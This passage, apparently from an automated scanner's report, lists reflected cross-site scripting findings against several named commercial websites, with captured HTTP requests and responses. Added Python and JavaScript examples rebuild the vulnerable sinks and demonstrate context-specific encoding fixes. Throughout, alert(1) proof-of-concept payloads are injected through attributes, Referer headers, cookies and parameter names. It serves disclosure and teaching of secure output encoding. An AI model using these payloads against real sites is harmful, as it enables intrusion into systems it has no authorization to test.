outerref: 'http://www.google.com/search?hl=en&amp;q=bd17a'-alert(1)-'7a4e41c4cba',
nwchannel: 'Network World',
request_uri: '/',
doc_uri: '/index.html',
site: 'home',
rxid: '75931',
nodeid: ''    
};

...[SNIP]...
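
The remediation notes in 2.422 and 2.431/2.432 (avoid echoing user data in script context) and the reflection points in 2.421 (double-quoted attribute) and 2.427 (HTML comment) reduce to one rule: encode for the exact context the value lands in, or validate it when no encoding exists for that context. The following is an added example, not code from this report or from the sites it covers. Using the four payloads quoted verbatim from those findings, it places each into a constructed, simplified copy of the observed sink, once as the site rendered it and once through the context-appropriate encoder, and checks with a parser whether the value survives as a single attribute or a single string literal. Function and constant names are the example's own.

```python
import html
import json
import re
from html.parser import HTMLParser

# Payloads quoted verbatim from the findings named in the lead-in.
P_ATTR    = '259e7"style="x:expression(alert(1))"b1f1939da85'  # 2.421, url parameter
P_JSNUM   = "04aaa7;alert(1)//63b47141f3f"                      # 2.422, autofollowed
P_COMMENT = "d3b00--><script>alert(1)</script>78152596edd"       # 2.427, Referer
P_JSSTR   = "e35db'-alert(1)-'8d2e281dc39"                       # 2.431, Referer


def enc_html(s):
    """Text nodes and quoted attribute values: & < > " ' become entities."""
    return html.escape(s, quote=True)


def enc_js_string(s):
    """Inside a quoted JS string literal. JSON escaping handles backslash, the
    double quote and control characters; the extra replacements stop a single
    quote from ending a '...' literal and keep </script> and <!-- out of the
    HTML tokenizer, which scans raw script text for those sequences."""
    out = json.dumps(s)[1:-1]
    for ch, esc in (("'", "\\u0027"), ("<", "\\u003c"), (">", "\\u003e"),
                    ("&", "\\u0026"), ("\u2028", "\\u2028"), ("\u2029", "\\u2029")):
        out = out.replace(ch, esc)
    return out


def enc_js_number(s, default=0):
    """Unquoted JS value: no encoding is safe there, so validate to the type
    the page expects (a small integer flag) and fall back to a default."""
    return int(s) if re.fullmatch(r"-?\d{1,9}", s) else default


def enc_comment(s):
    """HTML comment body: remove every '-' so '-->' (and '--!>') cannot form.
    Entities are not decoded inside comments, so the text is visibly altered;
    the better fix is not to write request headers into the page at all."""
    return s.replace("-", "&#45;")


# The sinks as observed in the responses (fixed=False) and as they should be
# written (fixed=True). Constructed, simplified copies of the real markup.

def sink_attr(value, fixed):
    v = enc_html(value) if fixed else value
    return '<input type="hidden" name="url" value="%s" />' % v

def sink_js_string(value, fixed):
    # The unfixed variant entity-encodes &, < and > (the 2.431 response shows
    # &amp;) but leaves quotes alone, which is why the payload still works.
    v = enc_js_string(value) if fixed else html.escape(value, quote=False)
    return "<script>var p = {outerref: '%s'};</script>" % v

def sink_js_number(value, fixed):
    v = enc_js_number(value) if fixed else value
    return "<script>var t = {autofollowed: %s};</script>" % v

def sink_comment(value, fixed):
    v = enc_comment(value) if fixed else value
    return "<!--HTTP_REFERER: %s-->" % v


# Checks: does the value survive as ONE attribute / ONE string literal?

class _InputAttrs(HTMLParser):
    def __init__(self):
        super().__init__()
        self.attrs = None
    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs = dict(attrs)

def attr_round_trips(fragment, value):
    """True iff the <input> carries exactly type/name/value and value == input."""
    p = _InputAttrs()
    p.feed(fragment)
    return (p.attrs is not None and set(p.attrs) == {"type", "name", "value"}
            and p.attrs["value"] == value)

def js_string_round_trips(fragment, value):
    """Extract the single-quoted literal, decode its escapes, compare."""
    m = re.search(r"outerref: '((?:[^'\\]|\\.)*)'", fragment)
    if not m:
        return False
    try:
        return json.loads('"%s"' % m.group(1)) == value
    except ValueError:
        return False


if __name__ == "__main__":
    for fixed in (False, True):
        print("fixed=%s" % fixed)
        print("  attr ok:", attr_round_trips(sink_attr(P_ATTR, fixed), P_ATTR))
        print("  js   ok:", js_string_round_trips(sink_js_string(P_JSSTR, fixed), P_JSSTR))
        print("  ", sink_js_number(P_JSNUM, fixed))
        print("  ", sink_comment(P_COMMENT, fixed))
```

The point of the two round-trip checks is that "the page looks fine" is not a test: the attribute check asks the parser how many attributes the tag ended up with, and the JS check decodes the literal and compares it with the original value, which is the property output encoding is supposed to guarantee. For the unquoted autofollowed value there is no encoder at all, only validation, which is what the 2.422 remediation note means by avoiding that context.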

2.433. http://www.quantcast.com/p-25K88fxDSEn9Y [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.quantcast.com
Path:   /p-25K88fxDSEn9Y

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c55f"><script>alert(1)</script>fff2cce0c0e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /p-25K88fxDSEn9Y HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5c55f"><script>alert(1)</script>fff2cce0c0e

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Thu, 16 Dec 2010 13:16:45 GMT
Expires: Wed, 15 Dec 2010 01:16:45 GMT
Cache-control: private, max-age=0
Set-Cookie: qcVisitor=0|76|1292505405733|0|NOTSET; Expires=Sat, 08-Dec-2040 13:16:45 GMT; Path=/
Set-Cookie: JSESSIONID=DDA567C2C52828645BFF387C4D18D863; Path=/
Set-Cookie: qcPageID="10.122.9.111,8006,81,Thu, 16 Dec 2010 13:16:45 UTC"; Version=1; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>
...[SNIP]...
<a id="homeFootContactUs" href="http://www.bing.com/search?q=5c55f"><script>alert(1)</script>fff2cce0c0e+-quantcast" rel="nofollow">
...[SNIP]...

2.434. http://www.quantcast.com/p-34PxbSficBeTc [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.quantcast.com
Path:   /p-34PxbSficBeTc

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d29ca"><script>alert(1)</script>c4c6cd67bee was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /p-34PxbSficBeTc HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d29ca"><script>alert(1)</script>c4c6cd67bee

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Thu, 16 Dec 2010 13:16:46 GMT
Expires: Wed, 15 Dec 2010 01:16:46 GMT
Cache-control: private, max-age=0
Set-Cookie: qcVisitor=0|60|1292505406778|0|NOTSET; Expires=Sat, 08-Dec-2040 13:16:46 GMT; Path=/
Set-Cookie: JSESSIONID=540EC469CF63870D060AE0FBE211F04A; Path=/
Set-Cookie: qcPageID="10.122.9.115,8004,75,Thu, 16 Dec 2010 13:16:46 UTC"; Version=1; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 30389
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>
...[SNIP]...
<a id="homeFootContactUs" href="http://www.bing.com/search?q=d29ca"><script>alert(1)</script>c4c6cd67bee+-quantcast" rel="nofollow">
...[SNIP]...

2.435. http://www.quantcast.com/p-fcYWUmj5YbYKM [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.quantcast.com
Path:   /p-fcYWUmj5YbYKM

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks: as in 2.434, the search term (the q parameter) is parsed out of a search-engine Referer and used, unencoded, to build the Bing search link (id homeFootContactUs) in the page. The payload e1171"><script>alert(1)</script>e63771cde2c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the data copied into the response arrives in a request header, the flaw is not trivial to exploit against another user: page script cannot set the Referer header of a cross-site request itself. Historically, client-side plugins such as Flash could be abused to make another user's browser send a request with an attacker-chosen header; where such a technique is available it can be used to exploit this flaw. Note also that browsers populate Referer from the URL of the linking page, so the practical question is whether an attacker can control that URL (including its query string) and whether the victim's browser sends it in full. This limitation partially mitigates the impact of the vulnerability.

Request

GET /p-fcYWUmj5YbYKM HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e1171"><script>alert(1)</script>e63771cde2c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Thu, 16 Dec 2010 13:16:45 GMT
Expires: Wed, 15 Dec 2010 01:16:46 GMT
Cache-control: private, max-age=0
Set-Cookie: qcVisitor=0|30|1292505406486|0|NOTSET; Expires=Sat, 08-Dec-2040 13:16:46 GMT; Path=/
Set-Cookie: JSESSIONID=B03A2A24BB4021EA9B80B4EA43966597; Path=/
Set-Cookie: qcPageID="10.122.9.112,8002,82,Thu, 16 Dec 2010 13:16:46 UTC"; Version=1; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 44018
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>
...[SNIP]...
<a id="homeFootContactUs" href="http://www.bing.com/search?q=e1171"><script>alert(1)</script>e63771cde2c+-quantcast" rel="nofollow">
...[SNIP]...

2.436. http://seg.sharethis.com/getSegment.php [__stid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags, inside a div with display:none that prints the raw cookie value after the label clicookie:. The payload a77ef<script>alert(1)</script>d04369783ff was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the data copied into the response arrives in a cookie, the flaw is not trivial to exploit against another user: you first need a way to set an arbitrary __stid value in the victim's browser, for example through a separate cookie-injection flaw or from a page on a related domain that is permitted to set cookies for seg.sharethis.com. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php HTTP/1.1
Host: seg.sharethis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __stid=CtZmwEyzRb19rULmKqKUAg==a77ef<script>alert(1)</script>d04369783ff;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Thu, 16 Dec 2010 14:15:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.3
Content-Length: 639


       <html>
       <head><title>ShareThis Segmenter</title></head>
       <body>
       <script type="text/javascript">
               var google_conversion_id = 1036609180;
               var google_conversion_language = "en";
               var goo
...[SNIP]...
<div style='display:none'>clicookie:CtZmwEyzRb19rULmKqKUAg==a77ef<script>alert(1)</script>d04369783ff
userid:
</div>
...[SNIP]...

2.437. http://www.idgtechpanel.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.idgtechpanel.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ecb01"-alert(1)-"d86887c70de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response, once for every entry of the language-menu array (aLObj.items) in the inline script; in each entry the expression "-alert(1)-" closes the string literal, so alert(1) would execute every time the array literal is evaluated.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input, so the redirect has to be followed for the attack to succeed; a browser does this automatically.

Note also that the response into which the data is copied is itself an HTTP 302 whose Location header points back at the same URL (the response also sets several cookies), and that the payload is echoed unencoded in that header as well as in the body. Browsers do not normally render the body of a redirect response, so unless the application can be prevented from redirecting (for example, by interfering with the response headers) the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
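To make the scanner's reasoning in findings 2.434 to 2.437 concrete, here is an added example (not part of the XSS.CX report, and not code from any of the sites it covers) that takes a response body and the canary that was sent, checks whether the canary came back unmodified, and works out which syntactic context it landed in. The sample bodies are shortened, constructed copies of the captured responses for 2.434, 2.436 and 2.437 plus one invented, correctly encoded variant; the function names are ours.

```javascript
// Added example: reproduces the scanner's reasoning for findings 2.434-2.437.
// Not code from the XSS.CX report or from any of the sites it covers.

// Classify where `canary` landed in `body`. Returns the context the scanner would
// report: 'attribute' (with its quote character), 'text', 'js-string' or 'js-code'.
// Good enough for the captured pages; a real scanner would also track comments,
// regex literals and template literals inside scripts.
function classifyReflection(body, canary) {
  const at = body.indexOf(canary);
  if (at < 0) {
    // Not echoed verbatim: was it echoed HTML-encoded instead (i.e. fixed)?
    const encoded = canary.replace(/"/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
    return body.includes(encoded)
      ? { reflected: true, encoded: true, context: null, quote: null }
      : { reflected: false, encoded: false, context: null, quote: null };
  }
  const before = body.slice(0, at);
  const lower = before.toLowerCase();

  // Inside a <script> block if the last "<script" comes after the last "</script".
  const lastOpen = lower.lastIndexOf('<script');
  if (lastOpen > lower.lastIndexOf('</script')) {
    const script = before.slice(before.indexOf('>', lastOpen) + 1);
    let quote = null; // quote character of the literal we are currently inside
    for (let i = 0; i < script.length; i++) {
      const c = script[i];
      if (quote) {
        if (c === '\\') i++; // skip the escaped character
        else if (c === quote) quote = null;
      } else if (c === '"' || c === "'") {
        quote = c;
      }
    }
    return { reflected: true, encoded: false, context: quote ? 'js-string' : 'js-code', quote };
  }

  // Inside a tag if the last '<' has not yet been closed by a '>'.
  const lt = before.lastIndexOf('<');
  if (lt > before.lastIndexOf('>')) {
    const tag = before.slice(lt);
    // An odd count of a quote character inside the tag means we are in that attribute value.
    for (const q of ['"', "'"]) {
      if ((tag.split(q).length - 1) % 2 === 1) {
        return { reflected: true, encoded: false, context: 'attribute', quote: q };
      }
    }
    return { reflected: true, encoded: false, context: 'tag', quote: null };
  }
  return { reflected: true, encoded: false, context: 'text', quote: null };
}

// Constructed, shortened copies of the captured responses (the SNIPped parts are omitted).
const SAMPLES = {
  // 2.434: Referer search term reflected into an href attribute
  referer: {
    canary: 'd29ca"><script>alert(1)</script>c4c6cd67bee',
    body: `<html><body><a id="homeFootContactUs" href="http://www.bing.com/search?q=d29ca"><script>alert(1)</script>c4c6cd67bee+-quantcast" rel="nofollow">Contact</a></body></html>`,
  },
  // 2.436: cookie value reflected as text between tags
  cookie: {
    canary: 'a77ef<script>alert(1)</script>d04369783ff',
    body: `<html><body><div style='display:none'>clicookie:CtZmwEyzRb19rULmKqKUAg==a77ef<script>alert(1)</script>d04369783ff\nuserid:\n</div></body></html>`,
  },
  // 2.437: parameter name reflected into a JS string literal
  param: {
    canary: 'ecb01"-alert(1)-"d86887c70de',
    body: `<html><head><script type="text/javascript" language="javascript">var aLObj={divclass:'anylinkmenu', inlinestyle:'', linktarget:''};aLObj.items=[["......", "/?ecb01"-alert(1)-"d86887c70de=1&L=1"],["Deutsch", "/?ecb01"-alert(1)-"d86887c70de=1&L=4"]];</script></head></html>`,
  },
  // invented: what 2.434 would look like if the value were HTML-encoded
  fixed: {
    canary: 'd29ca"><script>alert(1)</script>c4c6cd67bee',
    body: `<a href="http://www.bing.com/search?q=d29ca&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;c4c6cd67bee+-quantcast">`,
  },
};

function analyzeSamples() {
  const out = {};
  for (const [name, s] of Object.entries(SAMPLES)) out[name] = classifyReflection(s.body, s.canary);
  return out;
}

console.log(analyzeSamples());
```

The context decides both the payload shape and the fix: the attribute case needs the `">` prefix the scanner used, the text case needs none, and the script case needs only `"-…-"` to turn the literal into an expression, which is why the report rates the last one as the hardest to defend with HTML encoding alone.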

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value must be encoded for the JavaScript string context (for example by hex-escaping every character outside a small safe alphabet), not merely HTML-encoded; HTML encoding does not stop a double quote from terminating a string literal inside a script block.
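As an added illustration of that advice (this is our code, not the report's and not the vendors'), the following Node.js script builds the three reflected fragments from findings 2.434 to 2.437 first the way the captured pages built them and then with encoding chosen for the context, and checks the result: a structural tag count for the attribute and text cases, and for the script case actually evaluating the generated script with a stubbed alert. The template strings and helper names are ours; the payloads are the canaries recorded in the report.

```javascript
// Added example, not code from the XSS.CX report or the vendors it covers.
// Rebuilds the three reflected fragments from findings 2.434-2.437 the way the
// captured pages built them (raw concatenation) and then with encoding chosen for
// the context the value lands in. Template strings and helper names are ours;
// the payloads are the canaries recorded in the report.

// HTML text and double-quoted attribute context: escape the five significant characters.
function encodeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// JavaScript string-literal context: hex-escape everything outside a small safe
// alphabet, so quotes, backslashes, line terminators and "</script>" can never
// terminate the literal or the enclosing <script> block.
function encodeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9,._ ]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100 ? '\\x' + code.toString(16).padStart(2, '0')
                        : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// 2.434 / 2.435: search term taken from the Referer, copied into an href attribute.
function bingLinkVulnerable(q) {
  return `<a id="homeFootContactUs" href="http://www.bing.com/search?q=${q}+-quantcast" rel="nofollow">`;
}
function bingLinkSafe(q) {
  // URL-encode to keep the value inside the query component, then HTML-encode
  // the finished URL to keep it inside the attribute.
  const url = 'http://www.bing.com/search?q=' + encodeURIComponent(q + ' -quantcast');
  return `<a id="homeFootContactUs" href="${encodeHtml(url)}" rel="nofollow">`;
}

// 2.436: cookie value written as text between tags.
function debugDivVulnerable(cookie) {
  return `<div style='display:none'>clicookie:${cookie}\nuserid:\n</div>`;
}
function debugDivSafe(cookie) {
  return `<div style='display:none'>clicookie:${encodeHtml(cookie)}\nuserid:\n</div>`;
}

// 2.437: request URL copied into a string literal inside an inline script.
function menuScriptVulnerable(path) {
  return `<script>aLObj.items=[["Deutsch", "${path}&L=4"]];</script>`;
}
function menuScriptSafe(path) {
  return `<script>aLObj.items=[["Deutsch", "${encodeJsString(path + '&L=4')}"]];</script>`;
}

// Structural check for the two HTML contexts: the fragment must contain exactly the
// tags the template wrote, so every '<' beyond that is injected markup.
function tagCount(fragment) {
  return (fragment.match(/</g) || []).length;
}

// For the script context, run the generated script with a stub alert() and report
// whether the injected call fired and what value the menu entry ended up holding.
function runMenuScript(html) {
  const body = html.slice(html.indexOf('>') + 1, html.lastIndexOf('</script>'));
  let alerts = 0;
  const fn = new Function('alert', 'var aLObj = {}; ' + body + ' return aLObj.items;');
  const items = fn(() => { alerts += 1; });
  return { alerts, value: items[0][1] };
}

const ATTR_PAYLOAD = 'd29ca"><script>alert(1)</script>c4c6cd67bee';
const TEXT_PAYLOAD = 'CtZmwEyzRb19rULmKqKUAg==a77ef<script>alert(1)</script>d04369783ff';
const JS_PAYLOAD = '/?ecb01"-alert(1)-"d86887c70de=1';

function report() {
  const before = runMenuScript(menuScriptVulnerable(JS_PAYLOAD));
  const after = runMenuScript(menuScriptSafe(JS_PAYLOAD));
  return {
    attrTagsBefore: tagCount(bingLinkVulnerable(ATTR_PAYLOAD)), // 3: <a, <script>, </script>
    attrTagsAfter: tagCount(bingLinkSafe(ATTR_PAYLOAD)),        // 1: only <a
    textTagsBefore: tagCount(debugDivVulnerable(TEXT_PAYLOAD)), // 4
    textTagsAfter: tagCount(debugDivSafe(TEXT_PAYLOAD)),        // 2: <div and </div>
    alertsBefore: before.alerts, // 1: the injected alert(1) executed
    alertsAfter: after.alerts,   // 0
    valueAfter: after.value,     // the original path, decoded byte for byte
  };
}

console.log(report());
```

The vulnerable script case is instructive: `"/?ecb01"-alert(1)-"d86887c70de=1&L=4"` is a valid JavaScript subtraction expression, so the menu entry silently becomes NaN while alert(1) runs; after hex-escaping, the interpreter decodes the literal back to the exact original path and no code executes.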

Request

GET /?ecb01"-alert(1)-"d86887c70de=1 HTTP/1.1
Host: www.idgtechpanel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.0 302 Found
Date: Thu, 16 Dec 2010 13:31:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Location: /?ecb01"-alert(1)-"d86887c70de=1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ca6d2el2sh2g05ci74dsrjbu26; path=/
Set-Cookie: PL=NTk%3D; path=/
Set-Cookie: pshld=a%3A2%3A%7Bs%3A3%3A%22val%22%3Bs%3A32%3A%228d965d790b3ab4727548aca749d9b6a7%22%3Bs%3A2%3A%22ts%22%3Bi%3A1292506282%3B%7D; expires=Wed, 11-Dec-2030 13:31:22 GMT; path=/
Set-Cookie: SERVERID=SB3; path=/
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
   <head>
       <meta content="text/html; charse
...[SNIP]...
<script type="text/javascript" language="javascript">var aLObj={divclass:'anylinkmenu', inlinestyle:'', linktarget:''};aLObj.items=[["......", "/?ecb01"-alert(1)-"d86887c70de=1&L=1"],["Deutsch", "/?ecb01"-alert(1)-"d86887c70de=1&L=4"],["Espa&ntilde;ol", "/?ecb01"-alert(1)-"d86887c70de=1&L=10"],["Fran&ccedil;ais", "/?ecb01"-alert(1)-"d86887c70de=1&L=3"],["Italiano", "/?ecb0
...[SNIP]...
